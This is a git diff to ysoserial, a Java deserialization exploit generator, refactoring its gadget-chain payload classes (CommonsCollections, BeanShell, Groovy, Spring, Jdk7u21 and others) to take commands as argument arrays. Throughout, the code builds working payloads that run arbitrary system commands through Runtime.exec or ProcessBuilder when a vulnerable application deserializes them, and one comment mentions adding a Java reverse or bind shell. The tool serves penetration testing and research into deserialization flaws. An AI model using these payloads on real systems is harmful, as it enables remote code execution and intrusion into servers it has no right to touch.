diff --git a/pom.xml b/pom.xml
index 39ff36e4..abde6c0a 100644
--- a/pom.xml
+++ b/pom.xml
@@ -58,9 +58,10 @@
 		        <artifactId>maven-surefire-plugin</artifactId>
                 <version>2.20</version>
 		        <configuration>
+                    <rerunFailingTestsCount>2</rerunFailingTestsCount> <!-- for flaky Wicket1 test -->
 			        <trimStackTrace>false</trimStackTrace>
 			        <systemPropertyVariables>
-			        	<java.rmi.server.useCodebaseOnly>false</java.rmi.server.useCodebaseOnly>
+			        	    <java.rmi.server.useCodebaseOnly>false</java.rmi.server.useCodebaseOnly>
 			        </systemPropertyVariables>
 		        </configuration>
 		    </plugin>
diff --git a/src/main/java/ysoserial/GeneratePayload.java b/src/main/java/ysoserial/GeneratePayload.java
index 88776f34..6c0b5aa8 100644
--- a/src/main/java/ysoserial/GeneratePayload.java
+++ b/src/main/java/ysoserial/GeneratePayload.java
@@ -3,6 +3,7 @@
 import java.io.PrintStream;
 import java.util.*;
 
+import ysoserial.payloads.ExtendedObjectPayload;
 import ysoserial.payloads.ObjectPayload;
 import ysoserial.payloads.ObjectPayload.Utils;
 import ysoserial.payloads.annotation.Authors;
@@ -14,12 +15,12 @@ public class GeneratePayload {
 	private static final int USAGE_CODE = 64;
 
 	public static void main(final String[] args) {
-		if (args.length != 2) {
+		if (args.length < 2) {
 			printUsage();
 			System.exit(USAGE_CODE);
 		}
 		final String payloadType = args[0];
-		final String command = args[1];
+		final String[] command = Arrays.copyOfRange(args, 1, args.length);
 
 		final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
 		if (payloadClass == null) {
@@ -31,7 +32,18 @@ public static void main(final String[] args) {
 
 		try {
 			final ObjectPayload payload = payloadClass.newInstance();
-			final Object object = payload.getObject(command);
+			final Object object;
+			if (payload instanceof ExtendedObjectPayload) {
+				ExtendedObjectPayload extended_payload = (ExtendedObjectPayload) payload;
+				object = extended_payload.getObject(command);
+			}
+			else {
+				if (command.length > 1) {
+					System.err.println("The payload '" + payloadType + "' does not support arguments");
+				}
+				object = payload.getObject(command[0]);
+			}
+			
 			PrintStream out = System.out;
 			Serializer.serialize(object, out);
 			ObjectPayload.Utils.releasePayload(payload, object);
@@ -45,7 +57,7 @@ public static void main(final String[] args) {
 
 	private static void printUsage() {
 		System.err.println("Y SO SERIAL?");
-		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'");
+		System.err.println("Usage: java -jar ysoserial-[version]-all.jar payload  [arguments ...]");
 		System.err.println("  Available payload types:");
 
 		final List<Class<? extends ObjectPayload>> payloadClasses =
diff --git a/src/main/java/ysoserial/Strings.java b/src/main/java/ysoserial/Strings.java
index 84c21971..11775e7c 100644
--- a/src/main/java/ysoserial/Strings.java
+++ b/src/main/java/ysoserial/Strings.java
@@ -1,7 +1,5 @@
 package ysoserial;
 
-import org.apache.commons.lang.StringUtils;
-
 import java.util.Arrays;
 import java.util.Comparator;
 import java.util.LinkedList;
@@ -21,6 +19,10 @@ public static String join(Iterable<String> strings, String sep, String prefix, S
         return sb.toString();
     }
 
+	public static String join(Iterable<String> strings, String sep) {
+		return Strings.join(strings, sep, null, null);
+	}
+
     public static String repeat(String str, int num) {
         final String[] strs = new String[num];
         Arrays.fill(strs, str);
@@ -48,6 +50,19 @@ public static List<String> formatTable(List<String[]> rows) {
         }
         return lines;
     }
+    
+    public static String escapeJavaString(String str) {
+        return str.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\""); 
+    }
+    
+    public static String[] escapeJavaStrings(String[] strs) {
+        String[] res = new String[strs.length];
+        for (int i = 0; i < res.length; i++) {
+            res[i] = escapeJavaString(strs[i]);
+        }
+        return res;     
+    }
+    
 
     public static class ToStringComparator implements Comparator<Object> {
         public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); }
diff --git a/src/main/java/ysoserial/payloads/BeanShell1.java b/src/main/java/ysoserial/payloads/BeanShell1.java
index 8a9b711d..a0841be0 100644
--- a/src/main/java/ysoserial/payloads/BeanShell1.java
+++ b/src/main/java/ysoserial/payloads/BeanShell1.java
@@ -7,6 +7,7 @@
 import java.lang.reflect.Proxy;
 import java.util.Arrays;
 import java.util.Comparator;
+import java.util.List;
 import java.util.PriorityQueue;
 
 import ysoserial.Strings;
@@ -22,41 +23,41 @@
 @SuppressWarnings({ "rawtypes", "unchecked" })
 @Dependencies({ "org.beanshell:bsh:2.0b5" })
 @Authors({Authors.PWNTESTER, Authors.CSCHNEIDER4711})
-public class BeanShell1 extends PayloadRunner implements ObjectPayload<PriorityQueue> {
-
-    public PriorityQueue getObject(String command) throws Exception {
-	// BeanShell payload
+public class BeanShell1 extends ExtendedObjectPayload<PriorityQueue> {
 
+    public PriorityQueue getObject(String[] command) throws Exception {
+    	// BeanShell payload
+    
         String payload =
             "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" +
                 Strings.join( // does not support spaces in quotes
-                    Arrays.asList(command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\\"").split(" ")),
+                    Arrays.asList(Strings.escapeJavaStrings(command)),
                     ",", "\"", "\"") +
                 "}).start();return new Integer(1);}";
-
-	// Create Interpreter
-	Interpreter i = new Interpreter();
-
-	// Evaluate payload
-	i.eval(payload);
-
-	// Create InvocationHandler
-	XThis xt = new XThis(i.getNameSpace(), i);
-	InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);
-
-	// Create Comparator Proxy
-	Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);
-
-	// Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
-	final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
-	Object[] queue = new Object[] {1,1};
-	Reflections.setFieldValue(priorityQueue, "queue", queue);
-	Reflections.setFieldValue(priorityQueue, "size", 2);
-
-	return priorityQueue;
+    
+        	// Create Interpreter
+        	Interpreter i = new Interpreter();
+        
+        	// Evaluate payload
+        	i.eval(payload);
+        
+        	// Create InvocationHandler
+        	XThis xt = new XThis(i.getNameSpace(), i);
+        	InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);
+        
+        	// Create Comparator Proxy
+        	Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);
+        
+        	// Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
+        	final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
+        	Object[] queue = new Object[] {1,1};
+        	Reflections.setFieldValue(priorityQueue, "queue", queue);
+        	Reflections.setFieldValue(priorityQueue, "size", 2);
+        
+        	return priorityQueue;
     }
 
     public static void main(final String[] args) throws Exception {
-	PayloadRunner.run(BeanShell1.class, args);
+        PayloadRunner.run(BeanShell1.class, args);
     }
 }
diff --git a/src/main/java/ysoserial/payloads/Clojure.java b/src/main/java/ysoserial/payloads/Clojure.java
index 17d05428..8dd29026 100644
--- a/src/main/java/ysoserial/payloads/Clojure.java
+++ b/src/main/java/ysoserial/payloads/Clojure.java
@@ -26,23 +26,11 @@
  */
 @Dependencies({"org.clojure:clojure:1.8.0"})
 @Authors({ Authors.JACKOFMOSTTRADES })
-public class Clojure extends PayloadRunner implements ObjectPayload<Map<?, ?>> {
+public class Clojure extends ExtendedObjectPayload<Map<?, ?>> {
 
-	public Map<?, ?> getObject(final String command) throws Exception {
+	public Map<?, ?> getObject(final String[] command) throws Exception {
 
-//		final String[] execArgs = command.split(" ");
-//		final StringBuilder commandArgs = new StringBuilder();
-//		for (String arg : execArgs) {
-//			commandArgs.append("\" \"");
-//			commandArgs.append(arg);
-//		}
-//		commandArgs.append("\"");
-
-
-//		final String clojurePayload =
-//				String.format("(use '[clojure.java.shell :only [sh]]) (sh %s)", commandArgs.substring(2));
-
-        String cmd = Strings.join(Arrays.asList(command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\").split(" ")), " ", "\"", "\"");
+        String cmd = Strings.join(Arrays.asList(Strings.escapeJavaStrings(command)), " ", "\"", "\"");
 
         final String clojurePayload =
             String.format("(use '[clojure.java.shell :only [sh]]) (sh %s)", cmd);
@@ -70,5 +58,4 @@ public class Clojure extends PayloadRunner implements ObjectPayload<Map<?, ?>> {
 	public static void main(final String[] args) throws Exception {
 		PayloadRunner.run(Clojure.class, args);
 	}
-
 }
diff --git a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java
index 2495be77..234c3e8e 100755
--- a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java
+++ b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java
@@ -14,9 +14,9 @@
 @SuppressWarnings({ "rawtypes", "unchecked" })
 @Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
 @Authors({ Authors.FROHOFF })
-public class CommonsBeanutils1 implements ObjectPayload<Object> {
+public class CommonsBeanutils1 extends ExtendedObjectPayload<Object> {
 
-	public Object getObject(final String command) throws Exception {
+	public Object getObject(final String[] command) throws Exception {
 		final Object templates = Gadgets.createTemplatesImpl(command);
 		// mock method name until armed
 		final BeanComparator comparator = new BeanComparator("lowestSetBit");
diff --git a/src/main/java/ysoserial/payloads/CommonsCollections1.java b/src/main/java/ysoserial/payloads/CommonsCollections1.java
index 6f225948..9d50fb29 100644
--- a/src/main/java/ysoserial/payloads/CommonsCollections1.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections1.java
@@ -1,5 +1,6 @@
 package ysoserial.payloads;
 
+import java.io.Serializable;
 import java.lang.reflect.InvocationHandler;
 import java.util.HashMap;
 import java.util.Map;
@@ -44,10 +45,9 @@
 @PayloadTest ( precondition = "isApplicableJavaVersion")
 @Dependencies({"commons-collections:commons-collections:3.1"})
 @Authors({ Authors.FROHOFF })
-public class CommonsCollections1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
+public class CommonsCollections1 extends ExtendedObjectPayload<InvocationHandler> {
 
-	public InvocationHandler getObject(final String command) throws Exception {
-		final String[] execArgs = new String[] { command };
+	public InvocationHandler getObject(final String[] command) throws Exception {
 		// inert chain for setup
 		final Transformer transformerChain = new ChainedTransformer(
 			new Transformer[]{ new ConstantTransformer(1) });
@@ -61,7 +61,7 @@ public InvocationHandler getObject(final String command) throws Exception {
 					Object.class, Object[].class }, new Object[] {
 					null, new Object[0] }),
 				new InvokerTransformer("exec",
-					new Class[] { String.class }, execArgs),
+					new Class[] { String[].class }, new Object[] { command }),
 				new ConstantTransformer(1) };
 
 		final Map innerMap = new HashMap();
diff --git a/src/main/java/ysoserial/payloads/CommonsCollections2.java b/src/main/java/ysoserial/payloads/CommonsCollections2.java
index 7df52880..4c34be50 100755
--- a/src/main/java/ysoserial/payloads/CommonsCollections2.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections2.java
@@ -27,9 +27,9 @@
 @SuppressWarnings({ "rawtypes", "unchecked" })
 @Dependencies({ "org.apache.commons:commons-collections4:4.0" })
 @Authors({ Authors.FROHOFF })
-public class CommonsCollections2 implements ObjectPayload<Queue<Object>> {
+public class CommonsCollections2 extends ExtendedObjectPayload<Queue<Object>> {
 
-	public Queue<Object> getObject(final String command) throws Exception {
+	public Queue<Object> getObject(final String[] command) throws Exception {
 		final Object templates = Gadgets.createTemplatesImpl(command);
 		// mock method name until armed
 		final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
diff --git a/src/main/java/ysoserial/payloads/CommonsCollections3.java b/src/main/java/ysoserial/payloads/CommonsCollections3.java
index d780caae..ac3b7bff 100755
--- a/src/main/java/ysoserial/payloads/CommonsCollections3.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections3.java
@@ -30,9 +30,9 @@
 @PayloadTest ( precondition = "isApplicableJavaVersion")
 @Dependencies({"commons-collections:commons-collections:3.1"})
 @Authors({ Authors.FROHOFF })
-public class CommonsCollections3 extends PayloadRunner implements ObjectPayload<Object> {
+public class CommonsCollections3 extends ExtendedObjectPayload<Object> {
 
-	public Object getObject(final String command) throws Exception {
+	public Object getObject(final String[] command) throws Exception {
 		Object templatesImpl = Gadgets.createTemplatesImpl(command);
 
 		// inert chain for setup
diff --git a/src/main/java/ysoserial/payloads/CommonsCollections4.java b/src/main/java/ysoserial/payloads/CommonsCollections4.java
index 97a763cd..caf45401 100644
--- a/src/main/java/ysoserial/payloads/CommonsCollections4.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections4.java
@@ -26,9 +26,9 @@
 @SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
 @Dependencies({"org.apache.commons:commons-collections4:4.0"})
 @Authors({ Authors.FROHOFF })
-public class CommonsCollections4 implements ObjectPayload<Queue<Object>> {
+public class CommonsCollections4 extends ExtendedObjectPayload<Queue<Object>> {
 
-	public Queue<Object> getObject(final String command) throws Exception {
+	public Queue<Object> getObject(final String[] command) throws Exception {
 		Object templates = Gadgets.createTemplatesImpl(command);
 
 		ConstantTransformer constant = new ConstantTransformer(String.class);
diff --git a/src/main/java/ysoserial/payloads/CommonsCollections5.java b/src/main/java/ysoserial/payloads/CommonsCollections5.java
index bc322d69..89e05ba9 100644
--- a/src/main/java/ysoserial/payloads/CommonsCollections5.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections5.java
@@ -54,10 +54,9 @@
 @PayloadTest ( precondition = "isApplicableJavaVersion")
 @Dependencies({"commons-collections:commons-collections:3.1"})
 @Authors({ Authors.MATTHIASKAISER, Authors.JASINNER })
-public class CommonsCollections5 extends PayloadRunner implements ObjectPayload<BadAttributeValueExpException> {
+public class CommonsCollections5 extends ExtendedObjectPayload<BadAttributeValueExpException> {
 
-	public BadAttributeValueExpException getObject(final String command) throws Exception {
-		final String[] execArgs = new String[] { command };
+	public BadAttributeValueExpException getObject(final String[] command) throws Exception {
 		// inert chain for setup
 		final Transformer transformerChain = new ChainedTransformer(
 		        new Transformer[]{ new ConstantTransformer(1) });
@@ -71,7 +70,7 @@ public BadAttributeValueExpException getObject(final String command) throws Exce
 					Object.class, Object[].class }, new Object[] {
 					null, new Object[0] }),
 				new InvokerTransformer("exec",
-					new Class[] { String.class }, execArgs),
+					new Class[] { String[].class }, new Object[] { command }),
 				new ConstantTransformer(1) };
 
 		final Map innerMap = new HashMap();
diff --git a/src/main/java/ysoserial/payloads/CommonsCollections6.java b/src/main/java/ysoserial/payloads/CommonsCollections6.java
index 1412d2b4..f31720c5 100644
--- a/src/main/java/ysoserial/payloads/CommonsCollections6.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections6.java
@@ -35,12 +35,9 @@
 @SuppressWarnings({"rawtypes", "unchecked"})
 @Dependencies({"commons-collections:commons-collections:3.1"})
 @Authors({ Authors.MATTHIASKAISER })
-public class CommonsCollections6 extends PayloadRunner implements ObjectPayload<Serializable> {
-
-    public Serializable getObject(final String command) throws Exception {
-
-        final String[] execArgs = new String[] { command };
+public class CommonsCollections6 extends ExtendedObjectPayload<Serializable> {
 
+    public Serializable getObject(final String[] command) throws Exception {
         final Transformer[] transformers = new Transformer[] {
                 new ConstantTransformer(Runtime.class),
                 new InvokerTransformer("getMethod", new Class[] {
@@ -50,7 +47,7 @@ public Serializable getObject(final String command) throws Exception {
                         Object.class, Object[].class }, new Object[] {
                         null, new Object[0] }),
                 new InvokerTransformer("exec",
-                        new Class[] { String.class }, execArgs),
+                        new Class[] { String[].class }, new Object[] { command }),
                 new ConstantTransformer(1) };
 
         Transformer transformerChain = new ChainedTransformer(transformers);
diff --git a/src/main/java/ysoserial/payloads/ExtendedObjectPayload.java b/src/main/java/ysoserial/payloads/ExtendedObjectPayload.java
new file mode 100644
index 00000000..cdc01c02
--- /dev/null
+++ b/src/main/java/ysoserial/payloads/ExtendedObjectPayload.java
@@ -0,0 +1,24 @@
+package ysoserial.payloads;
+
+import java.util.LinkedList;
+import java.util.List;
+import java.util.StringTokenizer;
+
+public abstract class ExtendedObjectPayload<T> implements ObjectPayload<T> {
+	abstract public T getObject(String[] command) throws Exception;
+	
+	/**
+	 * Method to keep backward compatibility with ObjectPayload
+	 * using StringTokenizer used in java.lang.Runtime.exec(String)
+	 */
+	@Override
+	public T getObject(String command) throws Exception {
+		final StringTokenizer tokenizer = new StringTokenizer(command);
+		final List<String> commandTokenized = new LinkedList<String>();
+		while (tokenizer.hasMoreTokens()) {
+			commandTokenized.add(tokenizer.nextToken());
+		}
+		final String[] commandTokenizedArray= commandTokenized.toArray(new String[0]);
+		return this.getObject(commandTokenizedArray);
+	}
+}
diff --git a/src/main/java/ysoserial/payloads/Groovy1.java b/src/main/java/ysoserial/payloads/Groovy1.java
index 5e1832a0..2cefe820 100644
--- a/src/main/java/ysoserial/payloads/Groovy1.java
+++ b/src/main/java/ysoserial/payloads/Groovy1.java
@@ -29,9 +29,9 @@
 @SuppressWarnings({ "rawtypes", "unchecked" })
 @Dependencies({"org.codehaus.groovy:groovy:2.3.9"})
 @Authors({ Authors.FROHOFF })
-public class Groovy1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
+public class Groovy1 extends ExtendedObjectPayload<InvocationHandler> {
 
-	public InvocationHandler getObject(final String command) throws Exception {
+	public InvocationHandler getObject(final String[] command) throws Exception {
 		final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(command, "execute"), "entrySet");
 
 		final Map map = Gadgets.createProxy(closure, Map.class);
diff --git a/src/main/java/ysoserial/payloads/Hibernate1.java b/src/main/java/ysoserial/payloads/Hibernate1.java
index 01a79cec..2998e0c8 100644
--- a/src/main/java/ysoserial/payloads/Hibernate1.java
+++ b/src/main/java/ysoserial/payloads/Hibernate1.java
@@ -37,7 +37,7 @@
  * @author mbechler
  */
 @Authors({ Authors.MBECHLER })
-public class Hibernate1 implements ObjectPayload<Object>, DynamicDependencies {
+public class Hibernate1 extends ExtendedObjectPayload<Object> implements DynamicDependencies {
 
     public static String[] getDependencies () {
         if ( System.getProperty("hibernate5") != null ) {
@@ -96,7 +96,7 @@ public static Object makeHibernate5Getter ( Class<?> tplClass, String method ) t
     }
 
 
-    public Object getObject ( String command ) throws Exception {
+    public Object getObject ( String[] command ) throws Exception {
         Object tpl = Gadgets.createTemplatesImpl(command);
         Object getters = makeGetter(tpl.getClass(), "getOutputProperties");
         return makeCaller(tpl, getters);
diff --git a/src/main/java/ysoserial/payloads/JBossInterceptors1.java b/src/main/java/ysoserial/payloads/JBossInterceptors1.java
index 7fe37a50..24a1ea8c 100644
--- a/src/main/java/ysoserial/payloads/JBossInterceptors1.java
+++ b/src/main/java/ysoserial/payloads/JBossInterceptors1.java
@@ -30,9 +30,9 @@
     "javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1",
     "org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21" })
 @Authors({ Authors.MATTHIASKAISER })
-public class JBossInterceptors1 implements ObjectPayload<Object> {
+public class JBossInterceptors1 extends ExtendedObjectPayload<Object> {
 
-    public Object getObject(final String command) throws Exception {
+    public Object getObject(final String[] command) throws Exception {
 
         final Object gadget = Gadgets.createTemplatesImpl(command);
 
diff --git a/src/main/java/ysoserial/payloads/JSON1.java b/src/main/java/ysoserial/payloads/JSON1.java
index b959671c..21a420f0 100644
--- a/src/main/java/ysoserial/payloads/JSON1.java
+++ b/src/main/java/ysoserial/payloads/JSON1.java
@@ -66,9 +66,9 @@
     "net.sf.ezmorph:ezmorph:1.0.6", "commons-beanutils:commons-beanutils:1.9.2",
     "org.springframework:spring-core:4.1.4.RELEASE", "commons-collections:commons-collections:3.1" })
 @Authors({ Authors.MBECHLER })
-public class JSON1 implements ObjectPayload<Object> {
+public class JSON1 extends ExtendedObjectPayload<Object> {
 
-    public Map getObject ( String command ) throws Exception {
+    public Map getObject ( String[] command ) throws Exception {
         return makeCallerChain(Gadgets.createTemplatesImpl(command), Templates.class);
     }
 
diff --git a/src/main/java/ysoserial/payloads/JavassistWeld1.java b/src/main/java/ysoserial/payloads/JavassistWeld1.java
index cb1c601f..213b8683 100644
--- a/src/main/java/ysoserial/payloads/JavassistWeld1.java
+++ b/src/main/java/ysoserial/payloads/JavassistWeld1.java
@@ -30,9 +30,9 @@
     "javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1",
     "org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21" })
 @Authors({ Authors.MATTHIASKAISER })
-public class JavassistWeld1 implements ObjectPayload<Object> {
+public class JavassistWeld1 extends ExtendedObjectPayload<Object> {
 
-    public Object getObject(final String command) throws Exception {
+    public Object getObject(final String[] command) throws Exception {
 
         final Object gadget = Gadgets.createTemplatesImpl(command);
 
diff --git a/src/main/java/ysoserial/payloads/Jdk7u21.java b/src/main/java/ysoserial/payloads/Jdk7u21.java
index 35d25b61..279518c4 100755
--- a/src/main/java/ysoserial/payloads/Jdk7u21.java
+++ b/src/main/java/ysoserial/payloads/Jdk7u21.java
@@ -57,9 +57,9 @@
 @PayloadTest ( precondition = "isApplicableJavaVersion")
 @Dependencies()
 @Authors({ Authors.FROHOFF })
-public class Jdk7u21 implements ObjectPayload<Object> {
+public class Jdk7u21 extends ExtendedObjectPayload<Object> {
 
-	public Object getObject(final String command) throws Exception {
+	public Object getObject(final String[] command) throws Exception {
 		final Object templates = Gadgets.createTemplatesImpl(command);
 
 		String zeroHashCodeStr = "f5a5a608";
diff --git a/src/main/java/ysoserial/payloads/MozillaRhino1.java b/src/main/java/ysoserial/payloads/MozillaRhino1.java
index ea00e647..a6a23449 100644
--- a/src/main/java/ysoserial/payloads/MozillaRhino1.java
+++ b/src/main/java/ysoserial/payloads/MozillaRhino1.java
@@ -21,9 +21,9 @@
 @PayloadTest( precondition = "isApplicableJavaVersion")
 @Dependencies({"rhino:js:1.7R2"})
 @Authors({ Authors.MATTHIASKAISER })
-public class MozillaRhino1 implements ObjectPayload<Object> {
+public class MozillaRhino1 extends ExtendedObjectPayload<Object> {
 
-    public Object getObject(final String command) throws Exception {
+    public Object getObject(final String[] command) throws Exception {
 
         Class nativeErrorClass = Class.forName("org.mozilla.javascript.NativeError");
         Constructor nativeErrorConstructor = nativeErrorClass.getDeclaredConstructor();
diff --git a/src/main/java/ysoserial/payloads/ROME.java b/src/main/java/ysoserial/payloads/ROME.java
index f0842913..53b18341 100644
--- a/src/main/java/ysoserial/payloads/ROME.java
+++ b/src/main/java/ysoserial/payloads/ROME.java
@@ -30,9 +30,9 @@
  */
 @Dependencies("rome:rome:1.0")
 @Authors({ Authors.MBECHLER })
-public class ROME implements ObjectPayload<Object> {
+public class ROME extends ExtendedObjectPayload<Object> {
 
-    public Object getObject ( String command ) throws Exception {
+    public Object getObject ( String[] command ) throws Exception {
         Object o = Gadgets.createTemplatesImpl(command);
         ObjectBean delegate = new ObjectBean(Templates.class, o);
         ObjectBean root  = new ObjectBean(ObjectBean.class, delegate);
diff --git a/src/main/java/ysoserial/payloads/Spring1.java b/src/main/java/ysoserial/payloads/Spring1.java
index 00638794..24117c07 100644
--- a/src/main/java/ysoserial/payloads/Spring1.java
+++ b/src/main/java/ysoserial/payloads/Spring1.java
@@ -51,9 +51,9 @@
 @PayloadTest ( precondition = "isApplicableJavaVersion")
 @Dependencies({"org.springframework:spring-core:4.1.4.RELEASE","org.springframework:spring-beans:4.1.4.RELEASE"})
 @Authors({ Authors.FROHOFF })
-public class Spring1 extends PayloadRunner implements ObjectPayload<Object> {
+public class Spring1 extends ExtendedObjectPayload<Object> {
 
-	public Object getObject(final String command) throws Exception {
+	public Object getObject(final String[] command) throws Exception {
 		final Object templates = Gadgets.createTemplatesImpl(command);
 
 		final ObjectFactory objectFactoryProxy =
diff --git a/src/main/java/ysoserial/payloads/Spring2.java b/src/main/java/ysoserial/payloads/Spring2.java
index 11a29072..5d393b7f 100644
--- a/src/main/java/ysoserial/payloads/Spring2.java
+++ b/src/main/java/ysoserial/payloads/Spring2.java
@@ -43,9 +43,9 @@
     "aopalliance:aopalliance:1.0", "commons-logging:commons-logging:1.2"
 } )
 @Authors({ Authors.MBECHLER })
-public class Spring2 extends PayloadRunner implements ObjectPayload<Object> {
+public class Spring2 extends ExtendedObjectPayload<Object> {
 
-    public Object getObject ( final String command ) throws Exception {
+    public Object getObject ( final String[] command ) throws Exception {
         final Object templates = Gadgets.createTemplatesImpl(command);
 
         AdvisedSupport as = new AdvisedSupport();
diff --git a/src/main/java/ysoserial/payloads/util/Gadgets.java b/src/main/java/ysoserial/payloads/util/Gadgets.java
index 851adb40..405bdb58 100644
--- a/src/main/java/ysoserial/payloads/util/Gadgets.java
+++ b/src/main/java/ysoserial/payloads/util/Gadgets.java
@@ -9,12 +9,16 @@
 import java.lang.reflect.InvocationHandler;
 import java.lang.reflect.InvocationTargetException;
 import java.lang.reflect.Proxy;
+import java.util.Arrays;
 import java.util.HashMap;
+import java.util.LinkedList;
+import java.util.List;
 import java.util.Map;
 
 import javassist.ClassClassPath;
 import javassist.ClassPool;
 import javassist.CtClass;
+import ysoserial.Strings;
 
 import com.sun.org.apache.xalan.internal.xsltc.DOM;
 import com.sun.org.apache.xalan.internal.xsltc.TransletException;
@@ -89,7 +93,7 @@ public static Map<String, Object> createMap ( final String key, final Object val
     }
 
 
-    public static Object createTemplatesImpl ( final String command ) throws Exception {
+    public static Object createTemplatesImpl ( final String command[] ) throws Exception {
         if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) {
             return createTemplatesImpl(
                 command,
@@ -102,7 +106,7 @@ public static Object createTemplatesImpl ( final String command ) throws Excepti
     }
 
 
-    public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )
+    public static <T> T createTemplatesImpl ( final String command[], Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )
             throws Exception {
         final T templates = tplClass.newInstance();
 
@@ -113,9 +117,10 @@ public static <T> T createTemplatesImpl ( final String command, Class<T> tplClas
         final CtClass clazz = pool.get(StubTransletPayload.class.getName());
         // run command in static initializer
         // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
-        String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
-            command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
-            "\");";
+        String cmd = "java.lang.Runtime.getRuntime().exec(new String[] {" + 
+                Strings.join(Arrays.asList(Strings.escapeJavaStrings(command)), ", ", "\"", "\"") + 
+                "});";
+
         clazz.makeClassInitializer().insertAfter(cmd);
         // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
         clazz.setName("ysoserial.Pwner" + System.nanoTime());
diff --git a/src/main/java/ysoserial/payloads/util/PayloadRunner.java b/src/main/java/ysoserial/payloads/util/PayloadRunner.java
index 75816c38..f7355e10 100644
--- a/src/main/java/ysoserial/payloads/util/PayloadRunner.java
+++ b/src/main/java/ysoserial/payloads/util/PayloadRunner.java
@@ -1,5 +1,6 @@
 package ysoserial.payloads.util;
 
+import java.io.File;
 import java.util.concurrent.Callable;
 
 import ysoserial.Deserializer;
@@ -52,12 +53,12 @@ private static String getDefaultTestCmd() {
     }
 
     private static String getFirstExistingFile(String ... files) {
-        return "calc.exe";
-//        for (String path : files) {
-//            if (new File(path).exists()) {
-//                return path;
-//            }
-//        }
-//        throw new UnsupportedOperationException("no known test executable");
+//        return "calc.exe";
+        for (String path : files) {
+            if (new File(path).exists()) {
+                return path;
+            }
+        }
+        throw new UnsupportedOperationException("no known test executable");
     }
 }
diff --git a/src/test/java/ysoserial/payloads/TestHarnessTest.java b/src/test/java/ysoserial/payloads/TestHarnessTest.java
index 09df5dc6..33ce7f78 100755
--- a/src/test/java/ysoserial/payloads/TestHarnessTest.java
+++ b/src/test/java/ysoserial/payloads/TestHarnessTest.java
@@ -38,8 +38,8 @@ public void testHarnessExecPass() throws Exception {
 		PayloadsTest.testPayload(ExecMockPayload.class, new Class[] { ExecMockSerializable.class });
 	}
 
-	public static class ExecMockPayload implements ObjectPayload<ExecMockSerializable> {
-		public ExecMockSerializable getObject(String command) throws Exception {
+	public static class ExecMockPayload extends ExtendedObjectPayload<ExecMockSerializable> {
+		public ExecMockSerializable getObject(String[] command) throws Exception {
 			return new ExecMockSerializable(command);
 		}
 	}
@@ -52,8 +52,8 @@ public Integer getObject(String command) throws Exception {
 
 	@SuppressWarnings("serial")
 	public static class ExecMockSerializable implements Serializable {
-		private final String cmd;
-		public ExecMockSerializable(String cmd) { this.cmd = cmd; }
+		private final String[] cmd;
+		public ExecMockSerializable(String[] cmd) { this.cmd = cmd; }
 
 		private void readObject(final ObjectInputStream ois) throws IOException, ClassNotFoundException {
 		    ois.defaultReadObject();